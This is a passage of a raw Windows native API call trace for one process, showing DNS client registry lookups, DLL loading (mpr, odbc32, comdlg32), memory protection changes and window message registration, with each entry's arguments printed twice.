"Software\Policies\Microsoft\Windows NT\DnsClient"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03021 896 NtQueryValueKey (292, (292, "QueryAdapterName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03022 896 NtQueryValueKey (296, (296, "DisableAdapterDomainName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03023 896 NtQueryValueKey (292, (292, "UseDomainNameDevolution", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03024 896 NtQueryValueKey (296, (296, "UseDomainNameDevolution", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (296, "UseDomainNameDevolution", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 03025 896 NtQueryValueKey (292, (292, "PrioritizeRecordData", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03026 896 NtQueryValueKey (296, (296, "PrioritizeRecordData", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (296, "PrioritizeRecordData", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 03027 896 NtQueryValueKey (292, (292, "AllowUnqualifiedQuery", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03028 896 NtQueryValueKey (296, (296, "AllowUnqualifiedQuery", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (296, "AllowUnqualifiedQuery", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 03029 896 NtQueryValueKey (292, (292, "AppendToMultiLabelName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03030 896 NtQueryValueKey (292, (292, "ScreenBadTlds", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03031 896 NtQueryValueKey (292, (292, "ScreenUnreachableServers", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03032 896 NtQueryValueKey (292, (292, "FilterClusterIp", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03033 896 NtQueryValueKey (292, (292, "WaitForNameErrorOnAll", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03034 896 NtQueryValueKey (292, (292, "UseEdns", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03035 896 NtQueryValueKey (292, (292, "QueryIpMatching", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03036 896 NtQueryValueKey (292, (292, "UseHostsFile", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03037 896 NtQueryValueKey (292, (292, "RegistrationEnabled", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03038 896 NtQueryValueKey (296, (296, "DisableDynamicUpdate", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03039 896 NtQueryValueKey (292, (292, "RegisterPrimaryName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03040 896 NtQueryValueKey (292, (292, "RegisterAdapterName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03041 896 NtQueryValueKey (296, (296, "EnableAdapterDomainNameRegistration", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03042 896 NtQueryValueKey (292, (292, "RegisterReverseLookup", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03043 896 NtQueryValueKey (296, (296, "DisableReverseAddressRegistrations", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (296, "DisableReverseAddressRegistrations", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 03044 896 NtQueryValueKey (292, (292, "RegisterWanAdapters", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03045 896 NtQueryValueKey (296, (296, "DisableWanDynamicUpdate", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03046 896 NtQueryValueKey (292, (292, "RegistrationTtl", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03047 896 NtQueryValueKey (296, (296, "DefaultRegistrationTTL", Partial, 144, ... TitleIdx=0, Type=4, Data="\24\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (296, "DefaultRegistrationTTL", Partial, 144, ... TitleIdx=0, Type=4, Data="\24\0\0\0"}, 16, ) }, 16, ) == 0x0 03048 896 NtQueryValueKey (292, (292, "RegistrationRefreshInterval", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03049 896 NtQueryValueKey (296, (296, "DefaultRegistrationRefreshInterval", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03050 896 NtQueryValueKey (292, (292, "RegistrationMaxAddressCount", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03051 896 NtQueryValueKey (296, (296, "MaxNumberOfAddressesToRegister", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03052 896 NtQueryValueKey (292, (292, "UpdateSecurityLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03053 896 NtQueryValueKey (296, (296, "UpdateSecurityLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03054 896 NtQueryValueKey (292, (292, "UpdateZoneExcludeFile", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03055 896 NtQueryValueKey (292, (292, "UpdateTopLevelDomainZones", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03056 896 NtQueryValueKey (292, (292, "DnsTest", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03057 896 NtQueryValueKey (292, (292, "MaxCacheSize", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03058 896 NtQueryValueKey (292, (292, "MaxCacheTtl", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03059 896 NtQueryValueKey (292, (292, "MaxNegativeCacheTtl", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03060 896 NtQueryValueKey (292, (292, "AdapterTimeoutLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03061 896 NtQueryValueKey (292, (292, "ServerPriorityTimeLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03062 896 NtQueryValueKey (292, (292, "MaxCachedSockets", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03063 896 NtQueryValueKey (292, (292, "MulticastListenLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03064 896 NtQueryValueKey (292, (292, "MulticastSendLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03065 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "System\Setup"}, ... 300, ) }, ... 300, ) == 0x0 03066 896 NtQueryValueKey (300, (300, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (300, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 03067 896 NtClose (300, ... ) == 0x0 03068 896 NtClose (296, ... ) == 0x0 03069 896 NtClose (292, ... ) == 0x0 03070 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, ... 292, ) }, ... 292, ) == 0x0 03071 896 NtQueryValueKey (292, (292, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) , Partial, 144, ... TitleIdx=0, Type=7, Data= (292, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) }, 64, ) == 0x0 03072 896 NtQueryValueKey (292, (292, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) , Partial, 144, ... TitleIdx=0, Type=7, Data= (292, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) }, 64, ) == 0x0 03073 896 NtQueryValueKey (292, (292, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) , Partial, 144, ... TitleIdx=0, Type=7, Data= (292, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) }, 64, ) == 0x0 03074 896 NtQueryValueKey (292, (292, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) , Partial, 144, ... TitleIdx=0, Type=7, Data= (292, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) }, 64, ) == 0x0 03075 896 NtQueryValueKey (292, (292, "DnsQuickQueryTimeouts", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03076 896 NtQueryValueKey (292, (292, "DnsMulticastQueryTimeouts", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03077 896 NtClose (292, ... ) == 0x0 03078 896 NtProtectVirtualMemory (-1, (0x76f21064), 4, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03079 896 NtProtectVirtualMemory (-1, (0x76f21064), 4, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03080 896 NtProtectVirtualMemory (-1, (0x76f21078), 4, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03081 896 NtProtectVirtualMemory (-1, (0x76f21078), 4, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03082 896 NtProtectVirtualMemory (-1, (0x76f210e8), 4, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03083 896 NtProtectVirtualMemory (-1, (0x76f210e8), 4, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03084 896 NtProtectVirtualMemory (-1, (0x76f210ec), 4, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03085 896 NtProtectVirtualMemory (-1, (0x76f210ec), 4, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03086 896 NtProtectVirtualMemory (-1, (0x76f210f0), 4, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03087 896 NtProtectVirtualMemory (-1, (0x76f210f0), 4, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03088 896 NtProtectVirtualMemory (-1, (0x76f210f4), 4, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03089 896 NtProtectVirtualMemory (-1, (0x76f210f4), 4, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03090 896 NtProtectVirtualMemory (-1, (0x76f210fc), 4, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03091 896 NtProtectVirtualMemory (-1, (0x76f210fc), 4, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03092 896 NtProtectVirtualMemory (-1, (0x76f2111c), 4, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03093 896 NtProtectVirtualMemory (-1, (0x76f2111c), 4, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03094 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\iphlpapi.dll"}, 1239736, ... ) }, 1239736, ... ) == 0x0 03095 896 NtProtectVirtualMemory (-1, (0x76d6104c), 4, 4, ... (0x76d61000), 4096, 32, ) == 0x0 03096 896 NtProtectVirtualMemory (-1, (0x76d6104c), 4, 32, ... (0x76d61000), 4096, 4, ) == 0x0 03097 896 NtProtectVirtualMemory (-1, (0x76d61068), 4, 4, ... (0x76d61000), 4096, 32, ) == 0x0 03098 896 NtProtectVirtualMemory (-1, (0x76d61068), 4, 32, ... (0x76d61000), 4096, 4, ) == 0x0 03099 896 NtProtectVirtualMemory (-1, (0x76d61078), 4, 4, ... (0x76d61000), 4096, 32, ) == 0x0 03100 896 NtProtectVirtualMemory (-1, (0x76d61078), 4, 32, ... (0x76d61000), 4096, 4, ) == 0x0 03101 896 NtProtectVirtualMemory (-1, (0x76d6107c), 4, 4, ... (0x76d61000), 4096, 32, ) == 0x0 03102 896 NtProtectVirtualMemory (-1, (0x76d6107c), 4, 32, ... (0x76d61000), 4096, 4, ) == 0x0 03103 896 NtProtectVirtualMemory (-1, (0x76d610e4), 4, 4, ... (0x76d61000), 4096, 32, ) == 0x0 03104 896 NtProtectVirtualMemory (-1, (0x76d610e4), 4, 32, ... (0x76d61000), 4096, 4, ) == 0x0 03105 896 NtProtectVirtualMemory (-1, (0x76d610f0), 4, 4, ... (0x76d61000), 4096, 32, ) == 0x0 03106 896 NtProtectVirtualMemory (-1, (0x76d610f0), 4, 32, ... (0x76d61000), 4096, 4, ) == 0x0 03107 896 NtProtectVirtualMemory (-1, (0x76d610f8), 4, 4, ... (0x76d61000), 4096, 32, ) == 0x0 03108 896 NtProtectVirtualMemory (-1, (0x76d610f8), 4, 32, ... (0x76d61000), 4096, 4, ) == 0x0 03109 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "mpr.dll"}, ... 292, ) }, ... 292, ) == 0x0 03110 896 NtMapViewOfSection (292, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71b20000), 0x0, 73728, ) == 0x0 03111 896 NtClose (292, ... ) == 0x0 03112 896 NtProtectVirtualMemory (-1, (0x71b21000), 440, 4, ... (0x71b21000), 4096, 32, ) == 0x0 03113 896 NtProtectVirtualMemory (-1, (0x71b21000), 4096, 32, ... (0x71b21000), 4096, 4, ) == 0x0 03114 896 NtFlushInstructionCache (-1, 1907494912, 440, ... ) == 0x0 03115 896 NtProtectVirtualMemory (-1, (0x71b21000), 440, 4, ... (0x71b21000), 4096, 32, ) == 0x0 03116 896 NtProtectVirtualMemory (-1, (0x71b21000), 4096, 32, ... (0x71b21000), 4096, 4, ) == 0x0 03117 896 NtFlushInstructionCache (-1, 1907494912, 440, ... ) == 0x0 03118 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpr.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03119 896 NtCreateSemaphore (0x1f0003, 0x0, 1, 1, ... 292, ) == 0x0 03120 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 296, ) == 0x0 03121 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "system\CurrentControlSet\control\NetworkProvider\HwOrder"}, ... 300, ) }, ... 300, ) == 0x0 03122 896 NtNotifyChangeKey (300, 296, 0, 0, 2011455960, 4, 0, 0, 0, 1, ... ) == 0x103 03123 896 NtQueryInformationProcess (-1, 28, 4, ... {process info, class 28, size 4}, 0x0, ) == 0x0 03124 896 NtCreateSemaphore (0x100003, 0x0, 0, 2147483647, ... 304, ) == 0x0 03125 896 NtCreateSemaphore (0x100003, 0x0, 0, 2147483647, ... 308, ) == 0x0 03126 896 NtProtectVirtualMemory (-1, (0x71b21134), 4, 4, ... (0x71b21000), 4096, 32, ) == 0x0 03127 896 NtProtectVirtualMemory (-1, (0x71b21134), 4, 32, ... (0x71b21000), 4096, 4, ) == 0x0 03128 896 NtProtectVirtualMemory (-1, (0x71b2114c), 4, 4, ... (0x71b21000), 4096, 32, ) == 0x0 03129 896 NtProtectVirtualMemory (-1, (0x71b2114c), 4, 32, ... (0x71b21000), 4096, 4, ) == 0x0 03130 896 NtProtectVirtualMemory (-1, (0x71b21170), 4, 4, ... (0x71b21000), 4096, 32, ) == 0x0 03131 896 NtProtectVirtualMemory (-1, (0x71b21170), 4, 32, ... (0x71b21000), 4096, 4, ) == 0x0 03132 896 NtProtectVirtualMemory (-1, (0x71b21184), 4, 4, ... (0x71b21000), 4096, 32, ) == 0x0 03133 896 NtProtectVirtualMemory (-1, (0x71b21184), 4, 32, ... (0x71b21000), 4096, 4, ) == 0x0 03134 896 NtProtectVirtualMemory (-1, (0x71b21194), 4, 4, ... (0x71b21000), 4096, 32, ) == 0x0 03135 896 NtProtectVirtualMemory (-1, (0x71b21194), 4, 32, ... (0x71b21000), 4096, 4, ) == 0x0 03136 896 NtProtectVirtualMemory (-1, (0x71b21198), 4, 4, ... (0x71b21000), 4096, 32, ) == 0x0 03137 896 NtProtectVirtualMemory (-1, (0x71b21198), 4, 32, ... (0x71b21000), 4096, 4, ) == 0x0 03138 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll"}, 1239736, ... ) }, 1239736, ... ) == 0x0 03139 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "odbc32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03140 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\odbc32.dll"}, 1239772, ... ) }, 1239772, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03141 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbc32.dll"}, 1239772, ... ) }, 1239772, ... ) == 0x0 03142 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbc32.dll"}, 5, 96, ... 312, {status=0x0, info=1}, ) }, 5, 96, ... 312, {status=0x0, info=1}, ) == 0x0 03143 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 312, ... 316, ) == 0x0 03144 896 NtQuerySection (316, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 03145 896 NtClose (312, ... ) == 0x0 03146 896 NtMapViewOfSection (316, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x74320000), 0x0, 249856, ) == 0x0 03147 896 NtClose (316, ... ) == 0x0 03148 896 NtProtectVirtualMemory (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0 03149 896 NtProtectVirtualMemory (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0 03150 896 NtFlushInstructionCache (-1, 1949437952, 840, ... ) == 0x0 03151 896 NtProtectVirtualMemory (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0 03152 896 NtProtectVirtualMemory (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0 03153 896 NtFlushInstructionCache (-1, 1949437952, 840, ... ) == 0x0 03154 896 NtProtectVirtualMemory (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0 03155 896 NtProtectVirtualMemory (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0 03156 896 NtFlushInstructionCache (-1, 1949437952, 840, ... ) == 0x0 03157 896 NtProtectVirtualMemory (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0 03158 896 NtProtectVirtualMemory (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0 03159 896 NtFlushInstructionCache (-1, 1949437952, 840, ... ) == 0x0 03160 896 NtProtectVirtualMemory (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0 03161 896 NtProtectVirtualMemory (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0 03162 896 NtFlushInstructionCache (-1, 1949437952, 840, ... ) == 0x0 03163 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "comdlg32.dll"}, ... 316, ) }, ... 316, ) == 0x0 03164 896 NtMapViewOfSection (316, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x763b0000), 0x0, 299008, ) == 0x0 03165 896 NtClose (316, ... ) == 0x0 03166 896 NtProtectVirtualMemory (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03167 896 NtProtectVirtualMemory (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03168 896 NtFlushInstructionCache (-1, 1983582208, 1552, ... ) == 0x0 03169 896 NtProtectVirtualMemory (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03170 896 NtProtectVirtualMemory (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03171 896 NtFlushInstructionCache (-1, 1983582208, 1552, ... ) == 0x0 03172 896 NtProtectVirtualMemory (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03173 896 NtProtectVirtualMemory (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03174 896 NtFlushInstructionCache (-1, 1983582208, 1552, ... ) == 0x0 03175 896 NtProtectVirtualMemory (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03176 896 NtProtectVirtualMemory (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03177 896 NtFlushInstructionCache (-1, 1983582208, 1552, ... ) == 0x0 03178 896 NtProtectVirtualMemory (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03179 896 NtProtectVirtualMemory (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03180 896 NtFlushInstructionCache (-1, 1983582208, 1552, ... ) == 0x0 03181 896 NtProtectVirtualMemory (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03182 896 NtProtectVirtualMemory (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03183 896 NtFlushInstructionCache (-1, 1983582208, 1552, ... ) == 0x0 03184 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\comdlg32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03185 896 NtUserRegisterWindowMessage ( ("WOWLFChange", ... ) , ... ) == 0xc06c 03186 896 NtUserRegisterWindowMessage ( ("WOWDirChange", ... ) , ... ) == 0xc06d 03187 896 NtUserRegisterWindowMessage ( ("WOWCHOOSEFONT_GETLOGFONT", ... ) , ... ) == 0xc06e 03188 896 NtUserRegisterWindowMessage ( ("commdlg_LBSelChangedNotify", ... ) , ... ) == 0xc06f 03189 896 NtUserRegisterWindowMessage ( ("commdlg_ShareViolation", ... ) , ... ) == 0xc070 03190 896 NtUserRegisterWindowMessage ( ("commdlg_FileNameOK", ... ) , ... ) == 0xc071 03191 896 NtUserRegisterWindowMessage ( ("commdlg_ColorOK", ... ) , ... ) == 0xc072 03192 896 NtUserRegisterWindowMessage ( ("commdlg_SetRGBColor", ... ) , ... ) == 0xc073 03193 896 NtUserRegisterWindowMessage ( ("commdlg_LBSelChangedNotify", ... ) , ... ) == 0xc06f 03194 896 NtUserRegisterWindowMessage ( ("commdlg_ShareViolation", ... ) , ... ) == 0xc070 03195 896 NtUserRegisterWindowMessage ( ("commdlg_FileNameOK", ... ) , ... ) == 0xc071 03196 896 NtUserRegisterWindowMessage ( ("commdlg_ColorOK", ... ) , ... ) == 0xc072 03197 896 NtUserRegisterWindowMessage ( ("commdlg_SetRGBColor", ... ) , ... ) == 0xc073 03198 896 NtUserRegisterWindowMessage ( ("Shell IDList Array", ... ) , ... ) == 0xc074 03199 896 NtUserRegisterWindowMessage ( ("commdlg_help", ... ) , ... ) == 0xc075 03200 896 NtUserRegisterWindowMessage ( ("commdlg_help", ... ) , ... ) == 0xc075 03201 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\odbc32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03202 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\BidInterface\Loader"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03203 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\MDAC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03204 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 03205 896 NtQuerySystemInformation (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0 03206 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 03207 896 NtAllocateVirtualMemory (-1, 0, 0, 262144, 8192, 4, ... 14155776, 262144, ) == 0x0 03208 896 NtAllocateVirtualMemory (-1, 14155776, 0, 4096, 4096, 4, ... 14155776, 4096, ) == 0x0 03209 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 03210 896 NtAllocateVirtualMemory (-1, 0, 0, 262144, 8192, 4, ... 15466496, 262144, ) == 0x0 03211 896 NtAllocateVirtualMemory (-1, 15466496, 0, 4096, 4096, 4, ... 15466496, 4096, ) == 0x0 03212 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 03213 896 NtAllocateVirtualMemory (-1, 0, 0, 262144, 8192, 4, ... 15728640, 262144, ) == 0x0 03214 896 